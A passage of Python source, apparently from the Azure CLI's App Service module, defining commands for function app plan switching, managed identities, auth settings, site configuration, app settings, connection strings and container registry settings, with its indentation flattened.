raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
slot, api_version="2021-01-15")
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
def list_runtimes(cmd, os_type=None, linux=False):
if os_type is not None and linux:
raise MutuallyExclusiveArgumentError("Cannot use both --os-type and --linux")
if linux:
linux = True
windows = False
else:
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _StackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
return runtime_helper.get_stack_names_only(delimiter=":")
def list_function_app_runtimes(cmd, os_type=None):
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _FunctionAppStackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
linux_stacks = [r.to_dict() for r in runtime_helper.stacks if r.linux]
windows_stacks = [r.to_dict() for r in runtime_helper.stacks if not r.linux]
if linux and not windows:
return linux_stacks
if windows and not linux:
return windows_stacks
return {WINDOWS_OS_NAME: windows_stacks, LINUX_OS_NAME: linux_stacks}
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
